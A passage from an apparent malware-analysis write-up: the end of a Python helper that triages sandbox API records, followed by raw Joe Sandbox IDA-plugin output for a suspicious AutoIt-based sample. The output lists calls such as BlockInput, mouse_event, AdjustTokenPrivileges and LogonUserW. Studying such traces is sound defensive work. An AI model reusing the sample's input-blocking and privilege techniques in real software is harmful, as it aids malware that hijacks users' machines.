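        for f in triage_record(rec):
            print(f"record {i} @ {rec[0].ref:08X}: {f}")
```

Feed the helper the whole "APIs" section of a report and it reduces hundreds of records to the handful worth opening in the disassembler; on this sample it surfaces the admin check, the input block, the synthetic mouse click and the privilege adjustment while leaving the GetLastError/FormatMessageW error-formatting stub unflagged.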
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9e48afb324070f6aaa52e729ab3bf1f3acce9af74746ab78f75c321fb7c50595
                    • Instruction ID: 8f4bbfc3af5b809020024e5dd54899dc5e60e27ee76123f58f7ebcbe1d4df031
                    • Opcode Fuzzy Hash: 9e48afb324070f6aaa52e729ab3bf1f3acce9af74746ab78f75c321fb7c50595
                    • Instruction Fuzzy Hash: 8B229E70A00219DFDB28DF58C484AEEB7F1FF04311F148469ED569B341E7B8AA89CB91
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 007BC966
                    • FindClose.KERNEL32(00000000), ref: 007BC996
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: a959a34d74e19540882cbf2d1a593e93d30a6dbbea941f9c45b7661edbf14e2d
                    • Instruction ID: f3512af76273ee4b9ce347621bb80cf941ba3380a97b310e99903a0afefe3b05
                    • Opcode Fuzzy Hash: a959a34d74e19540882cbf2d1a593e93d30a6dbbea941f9c45b7661edbf14e2d
                    • Instruction Fuzzy Hash: 8A1170316002009FDB109F29C849A6AB7E9EF84321F04C51EF9A6D7291DB74A804CB91
                    APIs
                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,007C977D,?,007DFB84,?), ref: 007BA302
                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,007C977D,?,007DFB84,?), ref: 007BA314
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ErrorFormatLastMessage
                    • String ID:
                    • API String ID: 3479602957-0
                    • Opcode ID: c29ffc489cbf899c13e3ef571660023ebb0a952ca191265fa14e545cf6da576a
                    • Instruction ID: 47288ad3318cf9b3c08248321345b114941cb7cf1307b7350ee4ca922a5f1580
                    • Opcode Fuzzy Hash: c29ffc489cbf899c13e3ef571660023ebb0a952ca191265fa14e545cf6da576a
                    • Instruction Fuzzy Hash: BBF0E23154522DFBDB20AFA4CC48FEA776DBF08361F008166F809D3180D6349900CBA1
                    APIs
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007A8851), ref: 007A8728
                    • CloseHandle.KERNEL32(?,?,007A8851), ref: 007A873A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AdjustCloseHandlePrivilegesToken
                    • String ID:
                    • API String ID: 81990902-0
                    • Opcode ID: a2ba18ee05c5bbadd989695f408c6b5296f5137e90cfabeeeb5504a6baac5c85
                    • Instruction ID: 9948efb9c09789caa1976f2674ceaa6bb6c3a757ee74393f2941002b765b6e7d
                    • Opcode Fuzzy Hash: a2ba18ee05c5bbadd989695f408c6b5296f5137e90cfabeeeb5504a6baac5c85
                    • Instruction Fuzzy Hash: 8EE0B676011610EEEB252B64ED09D777BE9EB04394724C92AF49A80470DB66AC90DB10
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00778F97,?,?,?,00000001), ref: 0077A39A
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0077A3A3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: ad1ae0e169e6ef38e5eb7da79caf61ab602e3d20ec76683a9e2566eab59f24d4
                    • Instruction ID: 723b5d1694736db26958cb6d26c585ab0e301c97f4adf93a1d29c4041af5661e
                    • Opcode Fuzzy Hash: ad1ae0e169e6ef38e5eb7da79caf61ab602e3d20ec76683a9e2566eab59f24d4
                    • Instruction Fuzzy Hash: 3FB09231055208ABCA002B95EC09B883F78EB44AA2F41C022F60E84060CB6654508A99
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 45e1ab2c05fbb1ce24caa118c99cff984d817be705ef200ac487ec791203667a
                    • Instruction ID: 99430774f6c5e995d254604dba2c416c5fe82d8652e4ae1db7b4e3e3cf35e405
                    • Opcode Fuzzy Hash: 45e1ab2c05fbb1ce24caa118c99cff984d817be705ef200ac487ec791203667a
                    • Instruction Fuzzy Hash: 80324662D2AF814DDB279634DD72335A248AFBB3C4F15D737E819B99A6EB2CC4834104
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 72959ec6af4520cb8c0d9e5e0967e8015a25299bf9fd9d5ff5779204470d67ac
                    • Instruction ID: 51c7d6bf859f76333ce1ebde78032a14419ffb75d0a0577cdea1f6bfbcbf912c
                    • Opcode Fuzzy Hash: 72959ec6af4520cb8c0d9e5e0967e8015a25299bf9fd9d5ff5779204470d67ac
                    • Instruction Fuzzy Hash: A1B10120D2AF814DD723A6398871336BB4CAFBB2C5F52D71BFC1678D62EB2595834241
                    APIs
                    • __time64.LIBCMT ref: 007B8B25
                      • Part of subcall function 0077543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,007B91F8,00000000,?,?,?,?,007B93A9,00000000,?), ref: 00775443
                      • Part of subcall function 0077543A: __aulldiv.LIBCMT ref: 00775463
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Time$FileSystem__aulldiv__time64
                    • String ID:
                    • API String ID: 2893107130-0
                    • Opcode ID: e79040d2bce5b1761fa4c36e41579a66b86743150fa788b75e92b73ea0858e39
                    • Instruction ID: a4f51b083b13fb00dd3338a3dbafc2a415327dd27c9d9538c28be5aef3b48c7c
                    • Opcode Fuzzy Hash: e79040d2bce5b1761fa4c36e41579a66b86743150fa788b75e92b73ea0858e39
                    • Instruction Fuzzy Hash: CC21A272625510CBC729CF39D441B92B3E5EFA5311B288E6CD1E5CB2D0CA74B945CB94
                    APIs
                    • BlockInput.USER32(00000001), ref: 007C4218
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: BlockInput
                    • String ID:
                    • API String ID: 3456056419-0
                    • Opcode ID: f2d19b52add27c9c65f2106098ce6dc96adae0e09c05748b6fb3bf1eb1f6fb40
                    • Instruction ID: f25e12a49d3109e4e4794ddd70f5f8456b82bf89a5164d1b0120c00e55cec97e
                    • Opcode Fuzzy Hash: f2d19b52add27c9c65f2106098ce6dc96adae0e09c05748b6fb3bf1eb1f6fb40
                    • Instruction Fuzzy Hash: 8CE01A312402149FC710AF69D845E9AB7E8AF94761F00802AFD4AD7252DAB8EC448BA0
                    APIs
                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 007B4F18
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: mouse_event
                    • String ID:
                    • API String ID: 2434400541-0
                    • Opcode ID: e4e84eb0d5e2061aca56d05e2d10f57b55c52ec0814ad376cdaafc97dd3dc262
                    • Instruction ID: 5e92acceb992b5832d6c9aae0b6e0c2f5411d50a0ad1bc1f4f723b803e2f2196
                    • Opcode Fuzzy Hash: e4e84eb0d5e2061aca56d05e2d10f57b55c52ec0814ad376cdaafc97dd3dc262
                    • Instruction Fuzzy Hash: 11D09EB41646057DFC184F20AC1FFF61219E340791F9C99897202975C398EDA850A035
                    APIs
                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,007A88D1), ref: 007A8CB3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: LogonUser
                    • String ID:
                    • API String ID: 1244722697-0
                    • Opcode ID: 45566dd488d3ba071d984547ad0f5a54157b6ff9c241bc9c1b1c53574ef331fc
                    • Instruction ID: 14337a7d297767fe570a9c8c1a36846ee17671748f66915a7136190f25b3d144
                    • Opcode Fuzzy Hash: 45566dd488d3ba071d984547ad0f5a54157b6ff9c241bc9c1b1c53574ef331fc
                    • Instruction Fuzzy Hash: 63D09E3226450EABEF019EA4DD05EAE3B69EB04B01F408511FE16D61A1C775D935AB60
                    APIs
                    • GetUserNameW.ADVAPI32(?,?), ref: 00792242
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: f8ce815924d80b867ffc1b7a6d0ffa7794c62fada4c068369315da917d9a2a03
                    • Instruction ID: 1241e8f3589548e57956a96e004e33970ba1c00c6555140319aa5e2dcd4dbb7d
                    • Opcode Fuzzy Hash: f8ce815924d80b867ffc1b7a6d0ffa7794c62fada4c068369315da917d9a2a03
                    • Instruction Fuzzy Hash: DEC04CF1801109DBDB05DB90D988DFE77BCAB04304F104056E142F2100D7789B448A71
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0077A36A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: ea86fbdfe1a4eb2f0fc859c6d4a6445623f880ba4b10c49a8aa14688b5b42caa
                    • Instruction ID: 5929bcbe14cb47bef045c3d0c18237c3e1c9010939164d267bc6ccedf9c262b1
                    • Opcode Fuzzy Hash: ea86fbdfe1a4eb2f0fc859c6d4a6445623f880ba4b10c49a8aa14688b5b42caa
                    • Instruction Fuzzy Hash: F6A0113000020CABCA002B8AEC08888BFACEA002A0B008022F80E800228B32A8208A88
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1d09b0d5e38a58e1b81bc6668edb07fd360e0d5bd0baf3c92876e10c46af99d7
                    • Instruction ID: a2a2225215214c7a9b92a0fabe720e89596c33d2e80138d09aabfa90753c6567
                    • Opcode Fuzzy Hash: 1d09b0d5e38a58e1b81bc6668edb07fd360e0d5bd0baf3c92876e10c46af99d7
                    • Instruction Fuzzy Hash: 56223970A01615CBDF688F24C49467D77A1FB82304F6887AADC579B291EB3C9D81CB72
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction ID: d262c96590bf8bd5206a3f2133eec8801aa44f2a1891e442f81f60ba7efc6b3e
                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction Fuzzy Hash: 2FC1C4322061930ADF2D4A3D943503EBAE15EA27F135A8B5DE4BBCB4C5EF28D525D720
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction ID: 468aa242a37ea7c9dbc16326b1b1af8f29312825a6a4f0692cbc85e7f29753ec
                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction Fuzzy Hash: 7EC1E53220519309DF2D4A3E843003EBBE15BA27F135A8B6DE4BADB1D5EF28D525D720
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction ID: 58dbc2762a7282d2135135d1f1f1a01be0815db9c484ea9573882629c6e9efc5
                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction Fuzzy Hash: 93C1963220619309DF2D4A3D943503EBBE15AA27F139A8B6DE4BBCB5C4EF18D524D720
                    APIs
                    • DeleteObject.GDI32(00000000), ref: 007C7B70
                    • DeleteObject.GDI32(00000000), ref: 007C7B82
                    • DestroyWindow.USER32 ref: 007C7B90
                    • GetDesktopWindow.USER32 ref: 007C7BAA
                    • GetWindowRect.USER32(00000000), ref: 007C7BB1
                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007C7CF2
                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007C7D02
                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7D4A
                    • GetClientRect.USER32(00000000,?), ref: 007C7D56
                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 007C7D90
                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7DB2
                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7DC5
                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7DD0
                    • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7DD9
                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7DE8
                    • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7DF1
                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7DF8
                    • GlobalFree.KERNEL32(00000000), ref: 007C7E03
                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7E15
                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,007E2CAC,00000000), ref: 007C7E2B
                    • GlobalFree.KERNEL32(00000000), ref: 007C7E3B
                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 007C7E61
                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 007C7E80
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7EA2
                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C808F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                    • String ID: $AutoIt v3$DISPLAY$static
                    • API String ID: 2211948467-2373415609
                    • Opcode ID: f367591440bd5267764872492fc7a8d260ba558efe3800f081f7ff7884dd55dd
                    • Instruction ID: ab5e49b72bfefc9d14f646e2224329ec25cfba1b36f336b2dcf0e157d0879262
                    • Opcode Fuzzy Hash: f367591440bd5267764872492fc7a8d260ba558efe3800f081f7ff7884dd55dd
                    • Instruction Fuzzy Hash: 4C024871900119EFDB14DFA4CC89EAE7BB9FB48310F14815DF916AB2A1DB78AD01CB60
                    APIs
                    • CharUpperBuffW.USER32(?,?,007DF910), ref: 007D38AF
                    • IsWindowVisible.USER32(?), ref: 007D38D3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: BuffCharUpperVisibleWindow
                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                    • API String ID: 4105515805-45149045
                    • Opcode ID: cd7d7281345130de09e12e7bf4cb95ed5911e2c2b917e8c9ad82cf2988ee6212
                    • Instruction ID: 8b01d9eeca92f1c706f21d8061b4509840a5f68ca0353cda3dde0d4a21ed69a0
                    • Opcode Fuzzy Hash: cd7d7281345130de09e12e7bf4cb95ed5911e2c2b917e8c9ad82cf2988ee6212
